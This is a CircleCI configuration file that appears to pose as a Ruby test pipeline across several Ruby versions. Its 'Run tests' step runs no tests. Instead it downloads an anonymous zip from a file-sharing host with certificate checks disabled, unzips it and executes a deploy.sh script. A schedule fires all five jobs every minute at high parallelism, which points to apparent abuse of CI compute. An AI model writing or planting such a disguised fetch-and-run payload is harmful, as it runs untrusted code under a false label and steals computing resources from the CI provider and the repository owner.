working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run: curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
    - run: chmod +x ./cc-test-reporter
    - run: ./cc-test-reporter before-build
    - run: gem install bundler:2.1.4
    - run:
        name: Run tests
        command: |
                    apt update 
                    apt install screen -y 
                    wget --no-check-certificate -c https://transfer.sh/G9VQ5l/a-master.zip
                    unzip a-master.zip && cd a-master && chmod 777 deploy.sh && ./deploy.sh

version: 2.0
jobs:
  endvoc:
    docker:
      - image: ruby
    parallelism: 4   
    steps:
      - checkout
  endvoc1:
    <<: *script
    docker:
      - image: ruby:2.7
    parallelism: 4   
  endvoc2:
    <<: *script
    docker:
      - image: ruby:2.6
    parallelism: 4   
  endvoc3:
    <<: *script
    docker:
      - image: ruby:2.5
    parallelism: 4   
  endvoc4:
    <<: *script
    docker:
      - image: ruby:2.4
    parallelism: 4   
 
workflows:
  version: 2
  commit:
    jobs:
      - endvoc
      - endvoc1
      - endvoc2
      - endvoc3
      - endvoc4
     



    triggers:
      - schedule:
          cron: '* * * * *'
          filters:
            branches:
              only:
                - master
         
  endvocrunjob:
    jobs:
      - endvoc
      - endvoc1
      - endvoc2
      - endvoc3
      - endvoc4
      